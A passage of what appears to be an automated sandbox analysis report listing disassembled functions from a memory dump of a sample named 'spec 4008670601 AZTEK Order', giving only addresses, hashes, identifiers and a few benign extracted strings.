                                                      • Opcode Fuzzy Hash: f739975bf6fac3474c5434adec5c5d54aef60fe0cc127983d1e6d5788b303409
                                                      • Instruction Fuzzy Hash: 19827B75E002189FEB25CFA9C884BEDFBB5BF88310F548269E919AB751D7309981CF50
                                                      Function 01826420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID: 0-3916222277
                                                      • Opcode ID: 81d26b840519447bc9ffe8f7167022ad28e478fd7306f1eecf1e1b4874a7a4f1
                                                      • Instruction ID: 144ea78823a1c5e9a9e1a31fabaa4d8a1a1489511fe93c58af4001965c673129
                                                      • Opcode Fuzzy Hash: 81d26b840519447bc9ffe8f7167022ad28e478fd7306f1eecf1e1b4874a7a4f1
                                                      • Instruction Fuzzy Hash: CE916771900229AFEB22DF95CD85FAEBBB8EF18B50F204059F600EB195E774AD40CB50
                                                      Function 0184E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID: 0-3916222277
                                                      • Opcode ID: 0b929f01adab17296cd7bdcf410082f34b5833e8697b454c69378c3a2ea4027d
                                                      • Instruction ID: c5a932a9f97a0a17d4ed3a073443a91b40165407f69d3d7cc67cba4e84f9e376
                                                      • Opcode Fuzzy Hash: 0b929f01adab17296cd7bdcf410082f34b5833e8697b454c69378c3a2ea4027d
                                                      • Instruction Fuzzy Hash: 79918F3190061DABDB22ABA5DC88FAFBBB9FF45744F100029F501E7251EB389A01CB51
                                                      Function 017DA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: GlobalTags
                                                      • API String ID: 0-1106856819
                                                      • Opcode ID: f1910f47f154bd87cba8b63fa5de998ef2aef155c3ca05609311511262567f51
                                                      • Instruction ID: ae04b588e86351c7b0ac8a90374a4e18ff1a0bc04df4dcf791531cf0e3712640
                                                      • Opcode Fuzzy Hash: f1910f47f154bd87cba8b63fa5de998ef2aef155c3ca05609311511262567f51
                                                      • Instruction Fuzzy Hash: 08716FB6E0020ACFDF28CF9CD5906ADBBB5BF48710F24852EE945E7248E7719A41CB50
                                                      Function 01844978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .mui
                                                      • API String ID: 0-1199573805
                                                      • Opcode ID: 1294a8726cc965250e60ce7a57126f3cc2357d4d84c1545757750547eebad329
                                                      • Instruction ID: 7925e3e0f553ff873d11362ca8a676235e334398f0ada4693333bf3eab9ca0e5
                                                      • Opcode Fuzzy Hash: 1294a8726cc965250e60ce7a57126f3cc2357d4d84c1545757750547eebad329
                                                      • Instruction Fuzzy Hash: 12519172D0022E9BDF10DF99D844BAEFBB4AF08B54F054129EA11FB255DB349A01CBE4
                                                      Function 017BE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: EXT-
                                                      • API String ID: 0-1948896318
                                                      • Opcode ID: f96e274e0c2db5fa8d4a73b28c00b78a0625741b44f215e4aede2ac438ee8338
                                                      • Instruction ID: b7d58deb7cc90963252eb6ac6c1b5ebeac5f0ec5234f305d9de43ae0b65d65ab
                                                      • Opcode Fuzzy Hash: f96e274e0c2db5fa8d4a73b28c00b78a0625741b44f215e4aede2ac438ee8338
                                                      • Instruction Fuzzy Hash: BA417072508342ABD711DA75D884BEBFBE8AF88B14F440A2DF684D7280EB74D944C796
                                                      Function 0181C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: BinaryHash
                                                      • API String ID: 0-2202222882
                                                      • Opcode ID: 1852f749d57c12c97ce5c7937f1d938253d36f2a485c16cfaf7453a2dae6fc60
                                                      • Instruction ID: eae4daf10ff13b91d351460383e18c523a88414715315124ce99cff58efdc6f9
                                                      • Opcode Fuzzy Hash: 1852f749d57c12c97ce5c7937f1d938253d36f2a485c16cfaf7453a2dae6fc60
                                                      • Instruction Fuzzy Hash: F44142B2D4022DAADB21DB54CC84FDEB7BCAB44714F0045A5EB08EB145DB709F898FA5
                                                      Function 01836B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #
                                                      • API String ID: 0-1885708031
                                                      • Opcode ID: b1ccae5a7d0118eb2629616f66d53a7e533abd35c6c752e50e8d69d92d810889
                                                      • Instruction ID: 5946c84e1bcd33f50f9f724baf521927bf96112e6e9fc953a125430dd273c517
                                                      • Opcode Fuzzy Hash: b1ccae5a7d0118eb2629616f66d53a7e533abd35c6c752e50e8d69d92d810889
                                                      • Instruction Fuzzy Hash: 1231FE31A00719ABDB22DB6DC854BEEBBF4DF55704F284068E941DB282E775DB06CB90
                                                      Function 0181CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: BinaryName
                                                      • API String ID: 0-215506332
                                                      • Opcode ID: 189d89652c053799908e23fbaedb16815519850bbf2274577cd28c8e80dc67fd
                                                      • Instruction ID: 0cc54062ad31c98313f2364a27aba55ad2e9678629277c1811cd748a43e42e51
                                                      • Opcode Fuzzy Hash: 189d89652c053799908e23fbaedb16815519850bbf2274577cd28c8e80dc67fd
                                                      • Instruction Fuzzy Hash: E931D177A40519AFEB16DB59C845E6FBBB8FB80720F014129E905E7255D730AE04DBE0
                                                      Function 0182892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0182895E
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                      • API String ID: 0-702105204
                                                      • Opcode ID: cce563a9828d99f5a1ff5994a13d86421c6d9ef608b625bcf8ea9eb2654c1aa4
                                                      • Instruction ID: 97b68c095d8a05cd39094598003da0ca45033e152ecb5eb98e440abcc7a504d6
                                                      • Opcode Fuzzy Hash: cce563a9828d99f5a1ff5994a13d86421c6d9ef608b625bcf8ea9eb2654c1aa4
                                                      • Instruction Fuzzy Hash: E001F7323002319BEF276F9AD8C4B6A7BA5EF82754F08011DF64186555CB207AC0C792
                                                      Function 01842000 Relevance: .8, Instructions: 757COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 01d7c7970ca9b9d943d886e9abc22cc0e410cae5b587e6cfebe29497b78fcc41
                                                      • Instruction ID: cd0c04fab7fc9366772328b9c24abe4154d83e1162bbd54109144cbc8d9144c3
                                                      • Opcode Fuzzy Hash: 01d7c7970ca9b9d943d886e9abc22cc0e410cae5b587e6cfebe29497b78fcc41
                                                      • Instruction Fuzzy Hash: FC42C53560C3498BE725CF68D890A6FFBE6AF88704F04092DFA82D7250DB71DA45CB52
                                                      Function 01838158 Relevance: .6, Instructions: 617COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a3f111f3db09c3a4e020788ca75fab8c7f9a6d5bc207d789e5efc7f3031d27be
                                                      • Instruction ID: 1c5031d33e243d2523a3bda428cec4d85bc798be092cc7b8514bd3158e8524a0
                                                      • Opcode Fuzzy Hash: a3f111f3db09c3a4e020788ca75fab8c7f9a6d5bc207d789e5efc7f3031d27be
                                                      • Instruction Fuzzy Hash: A3424275E102198FEB25CF69C881BADFBF5BF89300F188199E949EB241D7349A85CF50
                                                      Function 017B2840 Relevance: .6, Instructions: 605COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e890a6fb990c1c45c0b72e45ca617cb0fd2d2efb2060fddb4caa54ce789e4847
                                                      • Instruction ID: 09d670deff33227186743ce2ea9891a705627e284390fa1342991dd26eaa4988
                                                      • Opcode Fuzzy Hash: e890a6fb990c1c45c0b72e45ca617cb0fd2d2efb2060fddb4caa54ce789e4847
                                                      • Instruction Fuzzy Hash: 9F32DF70A007598FDB66CF69CC847BABBF2BF84304F24411DE556DB285E735AA21CB50
                                                      Function 0184A118 Relevance: .6, Instructions: 591COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a3b574da113ea673e2b9ac4f3c61f63d8a0385dc1a01fb2fc3d74677dc44e079
                                                      • Instruction ID: 0daf9a6aebe6519eed4b9684641d584cd4ac8d73426f51147c1a9e4e02c0daa9
                                                      • Opcode Fuzzy Hash: a3b574da113ea673e2b9ac4f3c61f63d8a0385dc1a01fb2fc3d74677dc44e079
                                                      • Instruction Fuzzy Hash: 7222C2742446698BEB2DCF2DC094376BBF1AF44304F08845AE997CF286EB35D652DB60
                                                      Function 017A6A50 Relevance: .5, Instructions: 548COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: baa9ad21d76d6c89cdb78ccefbadce082d659669b9e33d8b504f80faee97a182
                                                      • Instruction ID: 8b6faa3d61cb7bffe2f6e5ec16c2f13c35559ed388bc409c25cd5c6fd987c9db
                                                      • Opcode Fuzzy Hash: baa9ad21d76d6c89cdb78ccefbadce082d659669b9e33d8b504f80faee97a182
                                                      • Instruction Fuzzy Hash: DC32AE71A01209CFDB25CF68C884AAAF7F1FF88310F684669E955EB391D734E941CB90
                                                      Function 017C4A35 Relevance: .4, Instructions: 423COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                      • Instruction ID: 97e43d292e6b0621cb476774175645ac0d2f51d18b30d3f75c71de6a4729ec2c
                                                      • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                      • Instruction Fuzzy Hash: 43F17074E0020A9BDB25DF99C994BAEFBF5AF48B10F04812DE902EB354E734E941CB50
                                                      Function 0183892B Relevance: .4, Instructions: 386COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 32174964f5590d01edb3cf1182ce176718a0c86978e9e50f685176539e8d65c4
                                                      • Instruction ID: 74cefc0a1422cf707b425ee100eae59c8c003b51e157a5df0008ddafd1b190b4
                                                      • Opcode Fuzzy Hash: 32174964f5590d01edb3cf1182ce176718a0c86978e9e50f685176539e8d65c4
                                                      • Instruction Fuzzy Hash: 2DD1D471A0060A9BDF15CF69C841AFEB7F1AFC9304F1C8269E955E7241D735EA068B90
                                                      Function 017A65D0 Relevance: .4, Instructions: 383COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 081e3b8a41a8db37bb6f3994ea76089ec447e29a2b4dbc439a899333f7c81b0b
                                                      • Instruction ID: 6a6d744c21ac7b3df6a6dc737763c1590856ba30b3d24ee5f0211c8b63ce3225
                                                      • Opcode Fuzzy Hash: 081e3b8a41a8db37bb6f3994ea76089ec447e29a2b4dbc439a899333f7c81b0b
                                                      • Instruction Fuzzy Hash: 6DE17871608342CFC715CF28C494A6AFBE0BF89314F598A6DF99987351EB31E905CB92
                                                      Function 01798397 Relevance: .4, Instructions: 380COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2d3655cfb39035bed7948cc9f5e30e95b3338b4f629fc40df7f6dd27da2404fd
                                                      • Instruction ID: 5f7b8f96c74019fefedfac4daa078a9291025d66b48c0851f4ae4f75437d74e4
                                                      • Opcode Fuzzy Hash: 2d3655cfb39035bed7948cc9f5e30e95b3338b4f629fc40df7f6dd27da2404fd
                                                      • Instruction Fuzzy Hash: A3D1EF71A0020A9BDF14CF68D880ABFF7B5BF55304F14426DEA12DB290EB34E958CB61
                                                      Function 01828243 Relevance: .3, Instructions: 322COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                      • Instruction ID: 3168b28e44b09dbc41e0bd281fe915e0e8d035ce6f4c49b9db724e5c1f7b6eb1
                                                      • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                      • Instruction Fuzzy Hash: EBB1A274A00619AFDF26DB98C940AABBBF5FF86304F14445DEA02D7790DB74EA85CB10
                                                      Function 017B0535 Relevance: .3, Instructions: 300COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                      • Instruction ID: f5fb7a2338aa8ba4a22fd2ea885475944e8e4d4adc594f179a227b4f7945ba95
                                                      • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                      • Instruction Fuzzy Hash: 78B1D73160064AAFDB26DB68C894BBFFBF6AF44304F144599E652D7285DB30DE41CB50
                                                      Function 017A83C0 Relevance: .3, Instructions: 281COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7808c39098aeb65b6a082eaafce0b9571fd1745242b2d7b0bf731a3f393630ec
                                                      • Instruction ID: 365c54488afc685f2bcca24b2f5e6cb622264f015d7614d835aad79984610b2d
                                                      • Opcode Fuzzy Hash: 7808c39098aeb65b6a082eaafce0b9571fd1745242b2d7b0bf731a3f393630ec
                                                      • Instruction Fuzzy Hash: 90C159742083458FE764CF19C498BABF7E5BF88304F54496DE98987291E774EA08CF92
                                                      Function 0179C427 Relevance: .3, Instructions: 280COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7a2548d46527ea8b3c9f213ff967a20b40c85a7f2cff461934ff1fd53b4892be
                                                      • Instruction ID: ba244a815379440cc9020d5ba61e917d475edac33734b83dd28a432619332f1a
                                                      • Opcode Fuzzy Hash: 7a2548d46527ea8b3c9f213ff967a20b40c85a7f2cff461934ff1fd53b4892be
                                                      • Instruction Fuzzy Hash: 85B17170A002668BDF65CF68D890BA9F7F5EF44700F1485E9D50AE7385EB309E89CB21
                                                      Function 017CE5E7 Relevance: .3, Instructions: 278COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 557272b72b8bd273bc2d8442a10f694bbd79df09c099395504464a6bdc80beff
                                                      • Instruction ID: 27daead4cbb9c3ef54b4ccc603e27d66b150ea4d87c7334cbaebaf07434c1165
                                                      • Opcode Fuzzy Hash: 557272b72b8bd273bc2d8442a10f694bbd79df09c099395504464a6bdc80beff
                                                      • Instruction Fuzzy Hash: 33A1E531E006599FEB32DB58CC48BADFFA4AB05B14F154169EB01EB2D1DB749E40CB91
                                                      Function 017E0185 Relevance: .3, Instructions: 276COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c74b10f6d7590026fbf718a0f8d62f3f7f3a7c9743762ed1255a68f5100ee4ba
                                                      • Instruction ID: 2e252fe47a24401ddc723786c5b2cb5dc243eb77ab5f307ff7ff5473ce3ca69b
                                                      • Opcode Fuzzy Hash: c74b10f6d7590026fbf718a0f8d62f3f7f3a7c9743762ed1255a68f5100ee4ba
                                                      • Instruction Fuzzy Hash: 97A10271B006169FDB24CF69C998BAAF7F5FF49318F104029EA05E7285DBB4E911CB50
                                                      Function 01874500 Relevance: .3, Instructions: 275COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cc8ee911b3e2cc4f6747877d4430d1d61cc0e5b6003a96554c42d297e710cc29
                                                      • Instruction ID: 3b3051312ee83dfd7087bcb1ca103fbc3e4201780476233368473b3c88b756ec
                                                      • Opcode Fuzzy Hash: cc8ee911b3e2cc4f6747877d4430d1d61cc0e5b6003a96554c42d297e710cc29
                                                      • Instruction Fuzzy Hash: 7AA1EC72A04216EFC722DF28C984B6ABBE9FF48744F150928F589DB655D334EE40CB91
                                                      Function 01872B57 Relevance: .3, Instructions: 266COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                      • Instruction ID: c3aad9f807a60214cae9ba64279f6c45e1ebcf2fe6dc3db938b40e921ea4912a
                                                      • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                      • Instruction Fuzzy Hash: C0B12771E0061ADFDB25CFA9C880AADBBB6BF88314F148129E914E7355D730EA41CB90
                                                      Function 018260E0 Relevance: .3, Instructions: 264COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 752d2f2a00487b10d37b52e63be5438ca3721ef14497c8ce777c0887e0e16d83
                                                      • Instruction ID: e2fc196847533b233ca84e1feb3102de72cb428188739bbb4262b9ea311b8977
                                                      • Opcode Fuzzy Hash: 752d2f2a00487b10d37b52e63be5438ca3721ef14497c8ce777c0887e0e16d83
                                                      • Instruction Fuzzy Hash: C0918871D00125AFDB16CF58D884BAEBFB5EF49710F254159EA10EB345E734EE409BA0
                                                      Function 017BE3F0 Relevance: .3, Instructions: 261COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ff5ceb06f6376dc51b350d77c21b205f2b7b83d050fafd2459291d5db7aed077
                                                      • Instruction ID: d347fb7dd2dd8eec16ea0a121ba7dc8e71ccc60dc2e8c91305d7b66f8cd8d252
                                                      • Opcode Fuzzy Hash: ff5ceb06f6376dc51b350d77c21b205f2b7b83d050fafd2459291d5db7aed077
                                                      • Instruction Fuzzy Hash: C7912531A00616CBDB259B58C8C4BF9FBA1EF84714F2540A9F905DB386FB38DA41C791
                                                      Function 017F6ACC Relevance: .2, Instructions: 226COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 90f72882f50ad7940af559e68bd0f55e1dedf7a8b0504fd43787e1f568e42a6d
                                                      • Instruction ID: b10ee2e88ea09f28ed10910c084c207982b23d41a7edb48dc2a3d5b2f47a1875
                                                      • Opcode Fuzzy Hash: 90f72882f50ad7940af559e68bd0f55e1dedf7a8b0504fd43787e1f568e42a6d
                                                      • Instruction Fuzzy Hash: 9B815E71A0061A9BDB24CF69C944ABFFBF9FB48700F14852EE555D7641E334E940CBA4
                                                      Function 0186AB40 Relevance: .2, Instructions: 222COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                      • Instruction ID: 7caa9fab62ad76711b1a7158866fb0912d9c7a4fc7f9e1328bc0f77ba71bcd30
                                                      • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                      • Instruction Fuzzy Hash: 20817271A002099FDF1DCF58C890AAEBBBAFF94314F148569D916EB344DB34DA41CB50
                                                      Function 017DE284 Relevance: .2, Instructions: 212COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2e29d2d8ddb3abe92eb30041930e3ed446810da21b67abdf5309a24aa9bbd2d6
                                                      • Instruction ID: e750f47676a95600baeaed61586530467d99b782dd1c8b3d353334da1644e686
